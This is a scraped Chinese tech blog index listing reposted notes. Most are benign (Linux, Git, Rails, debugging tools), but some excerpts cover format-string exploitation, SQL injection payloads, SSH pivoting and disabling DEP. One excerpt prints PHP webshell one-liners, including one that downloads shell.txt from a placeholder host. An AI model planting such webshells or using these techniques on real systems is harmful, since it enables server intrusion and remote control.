- 博客(36)
- 收藏
- 关注
RSS订阅转载 SP Flash Tool版本对应MTK处理器型号速查(SP Flash Tool Download)
SP Flash Tool For Windows Downloadhttps://monkey8.pipipan.com/dir/19250369-32189369-ac1637/SP Flash Tool For Linux Downloadhttps://monkey8.pipipan.com/dir/19250369-32189372-500c39/SN Write To...
2019-05-17 14:10:00
1362
转载 Linux安装中文输入法
以Debian系发行版Kali为例首先,安装fcitx输入法框架和fcitx-pinyin作为默认的拼音输入法:apt-get install fcitx fcitx-pinyin安装好之后,系统应该会多出这两个图标(在gnome桌面下)之后,将系统的输入源切换到fcitx,运行im-config或是在菜单中,点击这个红圈圈住的图标:一路下一步,在最后一步选择fcitx...
2018-06-12 21:55:00
152
转载 格式化字符串漏洞利用笔记
C语言字符串格式化类型:%c:输出字符,配上%n可用于向指定地址写数据。%d:输出十进制整数,配上%n可用于向指定地址写数据。%x:输出16进制数据,如%i$x表示要泄漏偏移i处4字节长的16进制数据,%i$lx表示要泄漏偏移i处8字节长的16进制数据,32bit和64bit环境下一样。%p:输出16进制数据,与%x基本一样,只是附加了前缀0x,在32bit下输出4字节,在64b...
2018-06-12 09:29:00
202
转载 MySQL user表初始化
默认安装的MySQL数据库,无法远程连接。登录MySQL之后,运行SELECT user,host from mysql.user;如果只有一条记录,说明是这个原因。将下面的脚本保存成user.sql,登录MySQL,运行:use mysql;source user.sql;flush privileges;Notice: 会重置MySQL user表,并且将root用户...
2018-06-08 11:13:00
422
转载 (转载)运维日志排查记录
忘了原文出自自哪里了,如果您是作者,请私信我补充来源链接。运维日志排查记录前言记录一些排查常见日志的命令,方法wiki,欢迎补充(Markdown 语法)。常用命令查找关键词并统计行数cat 2015_7_25_test_access.log | grep "sqlmap" | wc -l删除含有匹配字符的行sed -i '/Indy Library/d' 201...
2018-06-07 12:20:00
422
转载 Android APK 手动签名
首先,如果没有签名密钥,先生成密钥:keytool -genkey -alias android.keystore -keyalg RSA -validity 20000 -keystore android.keystore会一路提示你输入密码、签名信息等等,随意输入。我这里的用户名和密码都是android然后签名jarsigner -keystore android.keys...
2018-06-01 14:29:00
299
转载 Phantomjs 请求与响应
var page = require('webpage').create();page.onResourceRequested = function(request) { console.log('Request ' + JSON.stringify(request, undefined, 4)); console.log( '----------------------...
2018-05-31 08:23:00
292
转载 Javascript实现图片点击弹出
一直想给安装一个缩略图点击弹出的插件,但是找了找几乎都是用的php来做的,插件的使用和安装极其繁琐,于是上网查了些demo,自己实现了一个纯js的图片弹出插件。实现的思路是通过编写hook图片的onclick事件的函数,在函数中对body追加div元素,再将传入的图片对象放入元素中,同时再监听div的onclilck事件,当捕捉到点击,再关闭(其实是隐藏)弹出的div。通过在函数初始...
2018-05-31 00:41:00
1190
转载 Bash快捷操作
编辑命令Ctrl + a :移到命令行首Ctrl + e :移到命令行尾Ctrl + f :按字符前移(右向)Ctrl + b :按字符后移(左向)Alt + f :按单词前移(右向)Alt + b :按单词后移(左向)Ctrl + xx:在命令行首和光标之间移动Ctrl + u :从光标处删除至命令行首Ctrl + k :从光标处删除至命令行尾Ctrl + w :从...
2018-05-31 00:35:00
161
转载 Linux使用技巧汇总
Debian是我日常使用的桌面系统,这里记录了我在使用Debian和其他Linux时所有的问题和解决办法,以及一些其他的心得体会。向Debian致敬!找回桌面系统关机按钮在/etc/polkit-1/localauthority/50-local.d/新建文件50-admin.pkla,写入如下内容: [disable suspend] Identity=u...
2018-05-31 00:34:00
420
转载 SQL手工注入技巧
MYSQL篇1.内置函数和变量 @@datadir,version(),database(),user(),load_file(),outfile() 2.利用concat(),group_concat(),concat_ws()拼接查询结果实例: xxx.php?id=1 and 1=2 union select 1, group_concat(usern...
2018-05-31 00:33:00
140
转载 Ruby笔记
1.数组遍历方法总结 array = (1..10).to_a length = array.length length.times do t print "#{array[t]} " end puts "n" length = array.length-1 for i in 0..length do ...
2018-05-31 00:32:00
161
转载 ssh转发流量的四种姿势
在很多时候拿到了内网的一台主机,我们需要用它做跳板来对内网进一步扩大战果。也许方法很多,meterpreter,nc等等。但是最方便也最有可能穿透防火墙的方法,就是用ssh。分为四种类型:本地转发,远程转发,跳板转发,动态转发。本地转发假设攻击机A主机为本机,ip是y.y.y.y,用户是hacker,被攻击且用作跳板的主机是B,ip是x.x.x.x,对应的内网ip是10.0....
2018-05-31 00:31:00
1380
转载 GDB调试
使用GDB对GCC编译出的ELF文件进行调试。首先在编译的时候,需要加上-g参数:gcc -g -o test test.c -Wall这样才能在编译的时候产生符号表,GDB才可以载入。编译好程序以后,使用gdb test载入程序添加断点:b 行号运行:r单步执行(next):n跟踪步入(step):s恢复执行(continue):c打印变量值(print):p 变量...
2018-05-31 00:30:00
101
转载 Notepad++设置运行快捷键
python:先按F5,之后将下面的命令保存,再设置快捷键。 cmd /k c:\python27\python "$(FULL_CURRENT_PATH)" & PAUSE & EXIT我使用的是Ctrl+F9之后按Ctrl+s保存更改,再按Ctrl+F7即可快速在cmd中运行代码,方便调试。ruby cmd /k C:\Ruby22-x64...
2018-05-31 00:30:00
461
转载 渗透常用代码
PHP相关 <?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?> <?php include "$_GET['_']"; ?> <?php assert($_POST["1"]);?> <?php $url = "http://...
2018-05-31 00:29:00
1039
转载 各种环境下搭建ruby on rails开发环境
win10上搭建raby on rails环境:步骤如下1.安装ruby (我选择的版本是ruby 2.2.3p173)2.安装rails gem在这之前建议先把gem的源换成淘宝的源,速度快点。$ gem sources --add https://ruby.taobao.org/ --remove https://rubygems.org/$ gem sources -l...
2018-05-31 00:28:00
143
转载 windows笔记本命令行方式建立wifi热点
建立热点:@echo offnetsh wlan set hostednetwork mode=allownetsh wlan set hostednetwork ssid=热点名 key=密码netsh wlan start hostednetwork关闭热点netsh wlan set hostednetwork mode=disallow转载于:https://w...
2018-05-31 00:27:00
144
转载 基于树莓派2代的DIY无线路由器
最近手上多了一个树莓派2代,于是折腾就这么开始了。因为总是得要个显示屏或者路由器或者插根网线才能玩,有点麻烦,所以有了此文。设备清单:树莓派2代EDUP EP-N8508GS无线网卡(USB)普通网线一根最终实现的效果是树莓派的有线网卡用来作为wan口,无线网卡建立热点笔记本可以通过连接wifi连接上树莓派进行操作下面说说过程:首先我参考了http://elinux....
2018-05-31 00:26:00
171
转载 Java的面向对象属性
定义类定义类的过程就是定义类的属性的过程;类的属性就是累的静态属性的简称,指类内包含的各项数据。类的服务被称为成员函数或方法。继承extends通过定义继承方法,子类可以获得父类的所有属性和方法接口implements说明当前类中实现了哪个接口定义的功能和方法是Java语言中实现多重继承的一种机制类的修饰符分为:访问控制符抽象类说明符最终说明符类的属性:描述...
2018-05-31 00:26:00
115
转载 Linux内核学习笔记
2.2 内核源码树arch 特定体系结构的源码block Crypto APIcrypto 内核源码文档drivers 设备驱动程序firmwarefs VFS和各种文件系统include 内核头文件init 内核引导和初始化ipc 进程间通信代码kernel 像调度程序这样的核心子系统lib 通用内核函数MakefileMakefile.commonmm 内...
2018-05-31 00:24:00
98
转载 Linux设备驱动学习笔记
之前研究Linux设备驱动时做的零零散散的笔记,整理出来,方便以后复习。1.1驱动程序的的角色提供机制例如:unix图形界面分为X服务器和窗口会话管理器X服务器理解硬件及提供统一的接口给用户程序窗口管理器实现了特别的策略但对硬件一无所知目标:实现对策略透明1.2划分内核进程管理负责创建和销毁进程,并处理它们与外部的联系(输入和输出)。实现了多个进程在一个单个或几个C...
2018-05-31 00:23:00
96
转载 反汇编技术笔记-基础知识
相关学习资源二进制安全相关工具和教程站点http://www.openrce.orghttp://www.ollydbg.dehttp://www.sysersoft.comhttp://www.idapro.comhttp://www.woodmann.comhttp://www.hex-rays.com IDA prohttp://www.nuvisionmiami...
2018-05-31 00:22:00
429
转载 Apache服务器配置https
https://startssl.com这个网站可以给我们免费提供可信任的https证书,这里简单介绍一下配置的过程。首先服务器需要安装openssl和apache的mod_ssl.so模块,并且需要在httpd.conf中开启这个模块。完成上述操作之后就可以使用openssl生成你自己的证书了。这里有些知识你需要了解一下。https的整个服务中,你需要了解这些文件的作用: ...
2018-05-31 00:22:00
123
转载 VC内联汇编和GCC内联汇编的语法区别
VC: #include <stdio.h> main(){ int a = 1; int b = 2; int c; __asm{ mov eax,a mov ebx,b mov ecx,1h ...
2018-05-31 00:21:00
142
转载 浅析操作系统函数调用原理-附实例
最近在研究二进制,研究到函数调用部分,将自己理解的原理做个记录。首先需要了解系统栈的工作原理,栈可以理解成一种先进后出的数据结构,这就不用多说了。在操作系统中,系统栈也起到用来维护函数调用、参数传递等关系的一个作用。嗯,这是我的理解。在高级语言编程中,函数调用的底层原理是对用户屏蔽的,所以不用过多的纠结于底层的实现。而对于汇编研究者来说,了解这个原理就很重要了。首先可以想象一下...
2018-05-31 00:20:00
747
转载 PyQt4解析HTML Dom
环境:Windows 10Python 2.7.100x01 安装PyQt4在这个页面下载,注意选对版本。https://riverbankcomputing.com/software/pyqt/download我选择的版本是 PyQt4-4.11.4-gpl-Py2.7-Qt4.8.7-x64.exe0x02 编写测试脚本 import sys from ...
2018-05-31 00:20:00
134
转载 VirtualBox导入VmWare生成的.vmdk格式虚拟机镜像
VmWare默认的镜像格式是.vmdk格式的,VirtualBox则默认是.vdi格式的。其实这在VirtualBox新建虚拟机的过程中是可选的。导入.vmdk格式的镜像到VirtualBox只需要新建一个虚拟机,并且不创建虚拟硬盘。如下图:无视警告,继续:创建好之后,在设置里面把.vmdk格式的虚拟硬盘添加进去:这样就可以了。如果遇到windows虚拟机起不开的情...
2018-05-31 00:17:00
1967
转载 Linux内核编程-0:来自内核的 HelloWorld
Linux内核编程一直是我很想掌握的一个技能。如果问我为什么,我也说不上来。也许是希望有一天自己的ID也出现在内核开发组的邮件列表里?或是内核发行文件的CREDITS文件上?也许是吧。其实更多的,可能是对于底层的崇拜,以及对于内核的求索精神。想到操作系统的繁杂,想到软件系统之间的衔接,内心觉得精妙的同时,更是深深的迷恋。所以从这篇文章开始,我要真正的走进Linux内核里了,让代码...
2018-05-31 00:12:00
79
转载 Windows 7、Windows XP SP3关闭DEP堆栈执行保护
Windows XP SP3在Windows XP SP3中,关闭DEP的方法是:编辑C:\boot.ini,你大概会看到如下内容[boot loader]timeout=30default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS[operating systems]multi(0)disk(0)rdisk(0)partiti...
2018-05-31 00:10:00
387
转载 SP Flash Tool版本对应MTK处理器型号(SP Flash Tool 版本速查)
SP Flash Tool v3.1224.0.100MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,SP Flash Tool v3.1332.0.187MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6582,MT8135,SP Flash Tool v3.1344.0.2...
2018-05-31 00:07:00
1992
转载 第一个Hello,OS World操作系统
转载自 http://www.tsingfun.com/html/2015/dev_0804/hello_os_word_my_first_os.html首先阐述下程序运行的基本原理:计算机CPU只执行二进制指令,我们使用的开发语言开发出的程序最终由相应的编译器编译为二进制指令,二进制中包含程序相关的数据、代码指令(用我们最常见的公式描述就是:程序=数据+算法)。CPU读取相应的指令、...
2018-05-30 13:29:00
149
转载 Git常用命令
创建本地分支git branch NAME切换本地分支git checkout NAME查看远程分支git branch -r推送本地分支到远程仓库git push origin NAME引用子模块git submodule add RESPOSITORIES PATH# RESPOSSITORIES 是仓库地址# PATH是本地路径,默认是当前目录克隆带有子模块...
2018-05-23 13:25:00
59
转载 在Rails中最方便集成使用Bootstrap的方式
创建项目rails new BootstrapProject创建模型rails g scaffold xxx --skip-stylesheets运行迁移rake db:migrate--------- 如果项目和模型都已经建立好了并已经运行了迁移,那么可以省略以上步骤,直接进入下面的流程 ---------在Gemfile中添加bootstrap,这里使用twitter-...
2018-05-23 10:20:00
124
转载 IDA快捷键
Alt+T 搜索文本Ctrl+1 Quick View导航空格键 图形视图/汇编视图切换Shift+F3 切换到Functions窗口Shift+F4 切换到Names窗口Shift+F7 切换到Segments窗口Shift+F12 切换到Strings窗口IDA View内:Ctrl+Enter 前进(函数调用)Esc 后退(函数调用)转载于:https://...
2018-05-23 10:11:00
166
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人